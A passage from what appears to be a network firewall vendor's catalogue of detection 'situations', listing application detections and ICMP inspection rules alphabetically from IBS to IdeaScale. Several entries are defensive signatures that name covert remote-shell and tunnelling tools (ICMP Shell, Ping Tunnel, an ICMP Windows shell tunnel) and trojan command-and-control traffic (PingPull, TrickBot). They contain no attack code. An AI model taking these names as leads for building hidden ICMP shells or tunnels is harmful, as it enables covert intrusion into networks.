Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: IBS provide distribution resource management software, providing business applications for the wholesale, distribution and manufacturer
Back to top

Icanmakeitbetter

About this situation: icanmakeitbetter usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Social Networking, Application Routing
First detected in: sgpkg-ips-713-5211
Last changed: sgpkg-ips-1764-5242
Description: icanmakeitbetter is an insight community and customer feedback solution that provides surveys, live chat, focus groups, discussion forums, digital journals, ideation, and panel management, in a simple, single platform that works across any device for true on-demand, in-context insights. .
Back to top

ICAP

About this situation: Internet Content Adaptation Protocol usage detected
Context: Application Context
Severity: 1
Tags: Protocols, Infrastructure Services
First detected in: sgpkg-ips-474-5211
Last changed: sgpkg-ips-759-5211
Description: ICAP is a protocol aimed at providing simple object-based content vectoring for HTTP services.
Back to top

iCareManager

About this situation: Application iCareManager detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: iCareManager is a system that provides a set of features designed to help manage residents information and keep healthcare facility in compliance.
Back to top

ICBC

About this situation: ICBC usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Finance, Application Routing
First detected in: sgpkg-ips-625-5211
Last changed: sgpkg-ips-1764-5242
Description: ICBC usage detected. ICBC (Industrial and Commercial Bank of China) is a Chinese banking corporation.
Back to top

ICC

About this situation: Application ICC detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: International Computer Concepts (ICC) is a computer systems integrator and server manufacturing company focused on developing products and product appliances
Back to top

IceWEB

About this situation: Application IceWEB detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: IceWEB - Unified Data Storage for Cloud and Virtual Environments
Back to top

Icicletech

About this situation: Application Icicletech detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Icicle builds Web and Mobile products for Startups, Brands, Digital Agencies and Enterprises, helping in bringing their ideas to life. Icicle design, build Web applications, Mobile apps using technologies like Ruby on Rails, Javascript, Node.js, Ember.js, Angular.js, Android, iOS.
Back to top

iCIMS

About this situation: Application iCIMS detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: iCIMS is a web-based employment management system for HR and staffing professionals with a parsing tool to automate resume acquisition.
Back to top

IClassFactory

About this situation: MSRPC protocol traffic to IClassFactory Interface
Context: Application Context
Severity: 1
Tags: Protocols, OPC Auxiliary
First detected in: sgpkg-ips-659-5211
Last changed: sgpkg-ips-746-5211
Description: MSRPC protocol traffic to IClassFactory Interface. This Application requires engine version 5.7.4 or higher.
Back to top

iCloud

About this situation: Endpoint Context Agent based Apple iCloud
Context: EI Correlation
Severity: 1
Tags: Business Apps, Endpoint
First detected in: sgpkg-ips-989-5242
Last changed: sgpkg-ips-989-5242
Description: iCloud endpoint application has been detected. iCloud is a Apple's data sharing and synchronization service
Back to top

ICM-Document-Solutions

About this situation: Application ICM-Document-Solutions detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ICM Document Solutions provides software consulting and configuration management services. It's services provide business solutions that enable customers to manage electronic documents and improve productivity.
Back to top

ICMP

About this situation: ICMP usage detected
Context: Application Context
Severity: 1
Tags: Protocols, Infrastructure Services
First detected in: sgpkg-ips-562-5211
Last changed: sgpkg-ips-636-5211
Description: Internet Control Message Protocol (ICMP) protocol usage has been detected.
Back to top

ICMPv6_IP_ver-not-6

About this situation: ICMPv6 IP version not 6
Context: ICMP without parameters
Severity: 2
Tags: Suspected Invalid Packet Attacks
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1608-5242
Description: The ICMPv6 (Next Header 58) message was sent over IPv4. This situation is caused by a packet that violates the protocol specification. It can be safely terminated. In a Layer 3 role the packet will always be dropped, in L2 roles it can be configured to pass without processing. Note: This situation is a packet validity check situation. As an example, block listing is not possible for this situation, and it cannot be used in correlations performed on the engine. The usability of this situation in the inspection exception rules is different between engine versions 7.0 and older and 7.1 and newer. In engine versions 7.0 and older, an inspection exception rule for this situation will ignore all other matching fields, such as source and destination. Values selected in the exception rule, such as Action and Logging, will apply globally. From engine version 7.1 onwards, the source and destination fields can be used for matching with this situation in the inspection policy. For more information, and for the list of all packet validity situations, see the following Knowledge Base Article: https://support.forcepoint.com/s/article/What-are-Next-Generation-Firewall-sanity-check-situations
Back to top

ICMP_Address-Mask-Reply

About this situation: An ICMP Address Mask Reply (type 18, code 0) detected
Context: ICMP Response Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Disclosure, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-568-5211
Last changed: sgpkg-ips-568-5211
Description:
Back to top

ICMP_Address-Mask-Request

About this situation: An ICMP Address Mask Request (type 17, code 0) detected
Context: ICMP Request Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Probe, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-568-5211
Last changed: sgpkg-ips-568-5211
Description:
Back to top

ICMP_Checksum-Mismatch

About this situation: Invalid checksum in ICMP message
Context: ICMP without parameters
Severity: 2
Tags: Suspected Invalid Packet Attacks, Anomalies, SSM Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-561-5211
Description: The ICMP message had an invalid checksum. Note: This situation is a packet validity check situation. As an example, block listing is not possible for this situation, and it cannot be used in correlations performed on the engine. The IP header for this traffic is not considered valid, and thus the IP header information cannot be used for matching in the inspection policy. An inspection exception rule for this situation will ignore all other matching fields, such as source and destination. Values selected in the exception rule, such as Action and Logging, will apply globally. For more information, and for the list of all packet validity situations, see the following Knowledge Base Article: https://support.forcepoint.com/s/article/What-are-Next-Generation-Firewall-sanity-check-situations
Back to top

ICMP_Code-Unknown

About this situation: Unknown code in ICMP message
Context: ICMP without parameters
Severity: 2
Tags: Protocol Violations, SSM Anomalies, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-106-2032
Description: An ICMP message had an unknown code.
Back to top

ICMP_Connection-Reset-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: ICMP Request Stream
Severity: 7
Tags: Windows XP, Windows 98, Windows 2000, Windows ME, Windows 2003, Any Hardware, CVE2004, Windows XP not specific, Windows 2000 not specific, Windows 2003 not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-753-5211
Last changed: sgpkg-ips-1405-5242
Vulnerability: ICMP-Connection-Reset-Denial-Of-Service
Description:
Back to top

ICMP_Domain-Name-Invalid-Value

About this situation: Invalid domain name value
Context: ICMP without parameters
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-106-2032
Description: The contents of the domain name section of an ICMP domain name reply message were invalid.
Back to top

ICMP_Domain-Name-time_to_live-Negative

About this situation: Negative time_to_live value
Context: ICMP without parameters
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-106-2032
Description: The value of the time_to_live field in an ICMP domain name reply message was negative.
Back to top

ICMP_Echo-Fragmented

About this situation: ICMP echo message (ping) fragmented
Context: ICMP without parameters
Severity: 1
Tags: Protocol Information, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-454-4333
Description: The ICMP echo message (ping) was fragmented.
Back to top

ICMP_Echo-Length-Over-Limit

About this situation: The ICMP Echo message exceeded the defined limit.
Context: ICMP Echo Length Limit
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-160-2032
Description: The ICMP Echo message exceeded the length limit specified in the policy. The length covers the ICMP header and data. Risk analysis: This does not violate the ICMP protocol. This violates the defined limit in the policy. Most relevant log fields: "ICMP Echo length" log field shows the detected value.
Back to top

ICMP_Echo-Request-Modem-Hangup

About this situation: An ICMP Echo request (type 8, code 0) with modem hangup code detected
Context: ICMP Request Stream
Severity: 7
Tags: Any Operating System, Any Hardware, CVE1999, Any Operating System not specific, Denial of Service, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-561-5211
Last changed: sgpkg-ips-561-5211
Vulnerability: Echo-Request-Modem-Hangup
Description:
Back to top

ICMP_Error-TCP-sequence-mismatch

About this situation: The TCP sequence number in encapsulated TCP header of ICMP error was out of in flight range.
Context: ICMP without parameters
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-1396-5242
Last changed: sgpkg-ips-1396-5242
Description: The TCP sequence number in encapsulated TCP header of ICMP error was out of in flight range. This situation is made from an ICMP error packet, and if this is configured with Terminate action, the packet will be dropped and the error is not obeyed. Otherwise, the ICMP error is considered as valid and it is passed through. In TCP active mode the sequence number in encapsulated header is corrected and encapsulated TCP header is truncated to 8 bytes.
Back to top

ICMP_Fragmented-Message

About this situation: ICMP message (of any type) was fragmented
Context: ICMP without parameters
Severity: 1
Tags: Protocol Information, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-454-4333
Description: An ICMP message (of any type) was fragmented.
Back to top

ICMP_IP_ver-not-4

About this situation: ICMP IP version not 4
Context: ICMP without parameters
Severity: 2
Tags: Suspected Invalid Packet Attacks
First detected in: sgpkg-ips-154-2032
Last changed: sgpkg-ips-561-5211
Description: The ICMP (IP protocol 1) message underlying IP protocol version was not 4 (ICMPv4 over IPv6). This situation is made from a packet that violates the protocol specification and can be safely terminated. If the action is configured to be permitted, this packet will be handled by connection tracking and inspection, but not matched to the connection it may refer to. Note: This situation is a packet validity check situation. As an example, block listing is not possible for this situation, and it cannot be used in correlations performed on the engine. The usability of this situation in the inspection exception rules is different between engine versions 7.0 and older and 7.1 and newer. In engine versions 7.0 and older, an inspection exception rule for this situation will ignore all other matching fields, such as source and destination. Values selected in the exception rule, such as Action and Logging, will apply globally. From engine version 7.1 onwards, the source and destination fields can be used for matching with this situation in the inspection policy. For more information, and for the list of all packet validity situations, see the following Knowledge Base Article: https://support.forcepoint.com/s/article/What-are-Next-Generation-Firewall-sanity-check-situations
Back to top

ICMP_ISH-Shell-Usage

About this situation: ICMP Shell (ISH) usage detected
Context: ICMP Request Stream
Severity: 7
Tags: Unix, Linux, Any Hardware, ISH, Unix not specific, Linux not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-570-5211
Last changed: sgpkg-ips-586-5211
Description:
Back to top

ICMP_ISH-Shell-Usage-2

About this situation: ICMP Shell (ISH) usage detected
Context: ICMP Response Stream
Severity: 7
Tags: Unix, Linux, Any Hardware, ISH, Unix not specific, Linux not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-570-5211
Last changed: sgpkg-ips-586-5211
Description:
Back to top

ICMP_Length-Over-Limit

About this situation: The ICMP message exceeded the defined limit.
Context: ICMP Length Limit
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-160-2032
Description: The ICMP message exceeded the length limit specified in the policy. The length covers the ICMP header and data. Risk analysis: This does not violate the ICMP protocol. This violates the defined limit in the policy. Most relevant log fields: "ICMP message length" log field shows the detected value.
Back to top

ICMP_Message-Empty

About this situation: ICMP message header missing payload
Context: ICMP without parameters
Severity: 2
Tags: Suspected Invalid Packet Attacks
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-561-5211
Description: The ICMP or ICMPv6 message length was less than 4 bytes. Note: This situation is a packet validity check situation. As an example, block listing is not possible for this situation, and it cannot be used in correlations performed on the engine. The IP header for this traffic is not considered valid, and thus the IP header information cannot be used for matching in the inspection policy. An inspection exception rule for this situation will ignore all other matching fields, such as source and destination. Values selected in the exception rule, such as Action and Logging, will apply globally. For more information, and for the list of all packet validity situations, see the following Knowledge Base Article: https://support.forcepoint.com/s/article/What-are-Next-Generation-Firewall-sanity-check-situations
Back to top

ICMP_Message-Too-Long

About this situation: ICMP message longer than expected
Context: ICMP without parameters
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-106-2032
Description: The ICMP message was longer than expected.
Back to top

ICMP_Message-Too-Short

About this situation: ICMP message shorter than expected
Context: ICMP without parameters
Severity: 2
Tags: Suspected Invalid Packet Attacks, SSM Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-561-5211
Description: The ICMP message was shorter than expected. Note: This situation is a packet validity check situation. As an example, block listing is not possible for this situation, and it cannot be used in correlations performed on the engine. The usability of this situation in the inspection exception rules is different between engine versions 7.0 and older and 7.1 and newer. In engine versions 7.0 and older, an inspection exception rule for this situation will ignore all other matching fields, such as source and destination. Values selected in the exception rule, such as Action and Logging, will apply globally. From engine version 7.1 onwards, the source and destination fields can be used for matching with this situation in the inspection policy. For more information, and for the list of all packet validity situations, see the following Knowledge Base Article: https://support.forcepoint.com/s/article/What-are-Next-Generation-Firewall-sanity-check-situations
Back to top

ICMP_Microsoft-Windows-NAT-Driver-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in Microsoft Windows Server detected
Context: ICMP Response Stream
Severity: 7
Tags: Windows 2012, Any Hardware, MS2013-08, CVE2013, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-595-5211
Last changed: sgpkg-ips-595-5211
Vulnerability: Microsoft-Windows-NAT-Driver-Denial-Of-Service
Description:
Back to top

ICMP_Multiple-Vendor-ICMP-Connection-Reset-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: ICMP Response Stream
Severity: 7
Tags: Windows XP, Windows 2000, Windows 2003, Solaris 10, Solaris 9, Solaris 8, Solaris 7, Any Hardware, MS2005-04, MS2006-10, CVE2004, Windows XP not specific, Windows 2000 not specific, Windows 2003 not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-599-5211
Last changed: sgpkg-ips-599-5211
Vulnerability: Multiple-Vendor-ICMP-Connection-Reset-Denial-Of-Service
Description:
Back to top

ICMP_Multiple-Vendor-ICMP-Path-Mtu-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: ICMP Response Stream
Severity: 7
Tags: Windows XP, Windows 98, Windows 2000, Windows ME, Windows 2003, Any Hardware, MS2005-04, CVE2004, Windows XP not specific, Windows 2000 not specific, Windows 2003 not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-561-5211
Last changed: sgpkg-ips-561-5211
Vulnerability: Multiple-Vendor-ICMP-Path-Mtu-Denial-Of-Service
Description:
Back to top

ICMP_Netmask_Request_Scan_Started

About this situation: ICMP netmask request scan started
Context: Scan Started Event
Severity: 4
Tags: Inspection
First detected in: sgpkg-ips-105-2032
Last changed: sgpkg-ips-371-4219
Description: New ICMP netmask request scan activity detected. A host has sent a number of ICMP netmask requests. An ICMP netmask request allows a system to query another for the network address mask. These queries can be used as a method to discover network hosts, particularly if admins specifically block ICMP echo request packets and forget that other ICMP queries can be used for the same purpose. Connection attempts from this originating host have matched the port scanning detection paramaters. Tracking of this port/host scanning activity has been started and will be reported in subsequent related events. Risk analysis: Risk level is high. Port scanning can be used as part of the information gathering process and it often precedes an actual attack. Most relevant log fields: "Attacker IP" shows the originating IP address of the port scan. The counters and limit fields show the detection thresholds that were exceeded. "IP source" , "Source port" , "Destination port" , and "IP destination" show the source and destination addresses of the latest datagram related to this scan.
Back to top

ICMP_Ping-Tunnel-Usage

About this situation: Ping Tunnel usage detected
Context: ICMP Request Stream
Severity: 7
Tags: Unix, Linux, Any Hardware, Ping Tunnel, Unix not specific, Linux not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-573-5211
Last changed: sgpkg-ips-573-5211
Description:
Back to top

ICMP_Ping-Tunnel-Usage-2

About this situation: Ping Tunnel usage detected
Context: ICMP Response Stream
Severity: 7
Tags: Unix, Linux, Any Hardware, Ping Tunnel, Unix not specific, Linux not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-573-5211
Last changed: sgpkg-ips-573-5211
Description:
Back to top

ICMP_PingPull-Trojan-C2-ICMP-Echo-Request-Traffic

About this situation: PingPull remote access trojan command and control traffic detected
Context: ICMP Request Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1479-5242
Last changed: sgpkg-ips-1479-5242
Vulnerability: PingPull-Trojan-C2-Traffic
Description:
Back to top

ICMP_Ping_Scan_Started

About this situation: ICMP ping scan started
Context: Scan Started Event
Severity: 4
Tags: Inspection
First detected in: sgpkg-ips-105-2032
Last changed: sgpkg-ips-371-4219
Description: New ICMP ping scan activity detected. A host has sent a number of ICMP echo request (ping) packets. Connection attempts from this originating host have matched the port scanning detection paramaters. Tracking of this port/host scanning activity has been started and will be reported in subsequent related events. Risk analysis: Risk level is high. Port scanning can be used as part of the information gathering process and it often precedes an actual attack. Most relevant log fields: "Attacker IP" shows the originating IP address of the port scan. The counters and limit fields show the detection thresholds that were exceeded. "IP source" , "Source port" , "Destination port" , and "IP destination" show the source and destination addresses of the latest datagram related to this scan.
Back to top

ICMP_Portscan_End

About this situation: The timewindow for ICMP portscan events has ended
Context: Scan detection without parameters
Severity: 1
Tags: Inspection
First detected in: sgpkg-ips-545-5211
Last changed: sgpkg-ips-610-5211
Description: This situation is sent after a ICMP_Portscan_Started situation when the specified timewindow has been exceeded. The informational message field will show summary of the ports and hosts scanned.
Back to top

ICMP_Portscan_Started

About this situation: ICMP Portscan has started
Context: Scan detection without parameters
Severity: 1
Tags: Inspection
First detected in: sgpkg-ips-545-5211
Last changed: sgpkg-ips-610-5211
Description: The threshold value for ICMP portscan events within the specified timewindow has been exceeded. ICMP scan is in progress. A summary situation will be sent at the end of the timewindow.
Back to top

ICMP_Router-Advertisement-addr_entry_size-Invalid

About this situation: Value of addr_entry_size field invalid
Context: ICMP without parameters
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-106-2032
Description: The value of the addr_entry_size field in an ICMP router advertisement message was invalid.
Back to top

ICMP_Source-Quench-Denial-Of-Service

About this situation: ICMP Source Quench messages detected
Context: ICMP Request Stream
Severity: 2
Tags: Any Operating System, Any Hardware, CVE2004, Any Operating System not specific, Potential Denial of Service
First detected in: sgpkg-ips-755-5211
Last changed: sgpkg-ips-1405-5242
Vulnerability: ICMP-Source-Quench-Denial-Of-Service
Description:
Back to top

ICMP_Source-Quench-Message

About this situation: An ICMP Source Quench message (type 4, code 0) detected
Context: ICMP Request Stream
Severity: 2
Tags: Windows XP, Windows 98, Windows 2000, Windows ME, Windows 2003, Any Hardware, CVE2004, Windows XP not specific, Windows 2000 not specific, Windows 2003 not specific, Potential Denial of Service
First detected in: sgpkg-ips-561-5211
Last changed: sgpkg-ips-561-5211
Vulnerability: Multiple-Vendor-ICMP-Source-Quench-Denial-Of-Service
Description:
Back to top

ICMP_Timestamp-Invalid-Value

About this situation: Invalid timestamp
Context: ICMP without parameters
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-106-2032
Description: The value of the timestamp field in an ICMP timestamp message was invalid.
Back to top

ICMP_Timestamp-Reply

About this situation: An ICMP Timestamp reply (type 14, code 0) detected
Context: ICMP Response Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Disclosure, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-568-5211
Last changed: sgpkg-ips-568-5211
Description:
Back to top

ICMP_Timestamp-Request

About this situation: An ICMP Timestamp request (type 13, code 0) detected
Context: ICMP Request Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Probe, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-568-5211
Last changed: sgpkg-ips-568-5211
Description:
Back to top

ICMP_Timestamp_Request_Scan_Started

About this situation: ICMP timestamp request scan started
Context: Scan Started Event
Severity: 4
Tags: Inspection
First detected in: sgpkg-ips-105-2032
Last changed: sgpkg-ips-371-4219
Description: New ICMP timestamp request scan activity detected. A host has sent a number of ICMP timestamp requests. An ICMP timestamp request allows a system to query another for the current time. These queries can be used as a method to discover network hosts, particularly if admins specifically block ICMP echo request packets and forget that other ICMP queries can be used for the same purpose. Connection attempts from this originating host have matched the port scanning detection paramaters. Tracking of this port/host scanning activity has been started and will be reported in subsequent related events. Risk analysis: Risk level is high. Port scanning can be used as part of the information gathering process and it often precedes an actual attack. Most relevant log fields: "Attacker IP" shows the originating IP address of the port scan. The counters and limit fields show the detection thresholds that were exceeded. "IP source" , "Source port" , "Destination port" , and "IP destination" show the source and destination addresses of the latest datagram related to this scan.
Back to top

ICMP_Traceroute-Max-Hop-Count-Exceeded

About this situation: max_hop_count exceeded in ICMP traceroute message
Context: ICMP without parameters
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-106-2032
Description: The value of the max_hop_count field in an ICMP traceroute message was exceeded.
Back to top

ICMP_Traceroute-reported_mtu-Invalid

About this situation: Invalid reported_mtu field in ICMP traceroute message
Context: ICMP without parameters
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-106-2032
Description: The value of the reported_mtu field in an ICMP traceroute message was invalid.
Back to top

ICMP_TrickBot-AnchorDNS-ICMP-Probe-Request

About this situation: TrickBot AnchorDNS ICMP probe requests detected
Context: ICMP Request Stream
Severity: 7
Tags: Windows, Linux, Any Hardware, Windows not specific, Linux not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1294-5242
Last changed: sgpkg-ips-1405-5242
Vulnerability: TrickBot-C2-Traffic
Description:
Back to top

ICMP_TrickBot-AnchorDNS-ICMP-Probe-Response

About this situation: TrickBot AnchodDNS ICMP probe responses detected
Context: ICMP Response Stream
Severity: 7
Tags: Windows, Linux, Any Hardware, Windows not specific, Linux not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1294-5242
Last changed: sgpkg-ips-1405-5242
Vulnerability: TrickBot-C2-Traffic
Description:
Back to top

ICMP_Type-Unknown

About this situation: ICMP message type unknown
Context: ICMP without parameters
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-106-2032
Description: The ICMP message type was unknown.
Back to top

ICMP_Unused-Bits-Not-Zero

About this situation: Unused bits of ICMP message not zero
Context: ICMP without parameters
Severity: 2
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-240-3038
Description: The unused bits of an ICMP message were not zero.
Back to top

ICMP_Windows-Shell-Tunnel

About this situation: ICMP based shell tunnel for windows
Context: ICMP Request Stream
Severity: 10
Tags: Windows, Any Hardware, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1059-5242
Last changed: sgpkg-ips-1059-5242
Description:
Back to top

iComplete

About this situation: Application iComplete detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: icomplete CRM is all-in-one CRM with built-in VoIP and marketing services for small businesses and teams.
Back to top

IConnectionPoint

About this situation: MSRPC protocol traffic to IConnectionPoint Interface
Context: Application Context
Severity: 1
Tags: Protocols, OPC Auxiliary
First detected in: sgpkg-ips-595-5211
Last changed: sgpkg-ips-746-5211
Description: MSRPC protocol traffic to IConnectionPoint Interface. This Application requires engine version 5.7.4 or higher.
Back to top

IConnectionPointContainer

About this situation: MSRPC protocol traffic to IConnectionPointContainer Interface
Context: Application Context
Severity: 1
Tags: Protocols, OPC Auxiliary
First detected in: sgpkg-ips-595-5211
Last changed: sgpkg-ips-746-5211
Description: MSRPC protocol traffic to IConnectionPointContainer Interface. The IConnectionPointContainer interface is implemented on a connectable object to indicate the existence of the outgoing interfaces. It provides access to an enumerator sub-object with the IEnumConnectionPoints interface. Source: msdn.microsoft.com. This Application requires engine version 5.7.4 or higher.
Back to top

Icontact

About this situation: iContact usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Mail, Application Routing
First detected in: sgpkg-ips-631-5211
Last changed: sgpkg-ips-1764-5242
Description: THis service allows users to create, track, and send HTML-based emails and social media messages. It also offers Salesforce integration as well as Google Analytics integration. Source: Wikipedia
Back to top

iCore

About this situation: Application iCore detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: iCore Networks offers award winning cloud services, unified communications and hosted VoIP solutions tailored to service the unique needs of your company.
Back to top

ICQ

About this situation: ICQ traffic
Context: Application Context
Severity: 1
Tags: Protocols, Chat
First detected in: sgpkg-ips-450-4333
Last changed: sgpkg-ips-665-5211
Description: ICQ is an instant messaging computer program.
Back to top

ICQ2Go

About this situation: ICQ2Go usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Chat, Application Routing
First detected in: sgpkg-ips-558-5211
Last changed: sgpkg-ips-630-5211
Description: ICQ2Go is a web-based Instant Messaging application for users to communicate with each other in real time on the ICQ network.
Back to top

Icreate

About this situation: Application Icreate detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Fintellix is a Compliance, Risk and Analytics Products and Solutions provider for the Global Financial Services Industry. Fintellix's solutions are available for on-premises implementations as well as provisioning from Regional Cloud Infrastructure. Fintellix is currently active in India, US, Europe, Middle-East, Africa, South East Asia and counts some of the Global Top 50 Banks and Leading Global
Back to top

iCRM

About this situation: Application iCRM detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: The Institute of Certified Records Managers
Back to top

Ict

About this situation: Application Ict detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ICT Automatisering is committed to enhancing clients' flexibility and operational simplicity, while improving their business, production and communication processes. It's a commitment that's possible by making available the highest levels of technological know-how. Know-how that we then deliver in the form of inventive and effective product
Back to top

Icyte

About this situation: iCyte usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Office, Application Routing
First detected in: sgpkg-ips-713-5211
Last changed: sgpkg-ips-1764-5242
Description: iCyte's realtime search ensures you'll instantly find what you're looking for. Remember why it's important with your highlights, tags and notes. iCyte lets you save webpages and PDF's exactly as you remember them. They've crafted their saver to reflect every last detail.
Back to top

ID-Quantique

About this situation: Application ID-Quantique detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ID Quantique is provider of quantum-safe crypto and leverages quantum technology in the fields of random numbers and scientific instrumentation.
Back to top

iDashboards

About this situation: Application iDashboards detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Enterprise dashboard software solution.
Back to top

IDBS

About this situation: Application IDBS detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: IDBS is a provider of software for R and D with the technology to capture, manage, share and exploit structured and unstructured data.
Back to top

IDC

About this situation: Application IDC detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: International Data Corporation
Back to top

Ideagility

About this situation: Application Ideagility detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Ideagility is an online marketing company, providing search marketing software solutions for small to medium businesses.
Back to top

iDeals-Virtual-Data-Room

About this situation: Application iDeals-Virtual-Data-Room detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: iDeals Virtual Data Room solutions provide users with a highly controlled means of sharing confidential or regulated content with internal teams and third parties outside of the company.
Back to top

Ideas

About this situation: Application Ideas detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: IDeaS Revenue Solutions - a SAS Company, is the provider of pricing and revenue management software, services and consulting. IDeaS enables global organizations such as hotel, travel and transportation companies to understand, anticipate and react to consumer behavior in order to optimize revenue and profits
Back to top

IdeaScale

About this situation: Application IdeaScale detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: IdeaScale is a cloud-based software company that licenses an management platform employing the principles and practices of crowdsourcing.
Back to top

Ideator

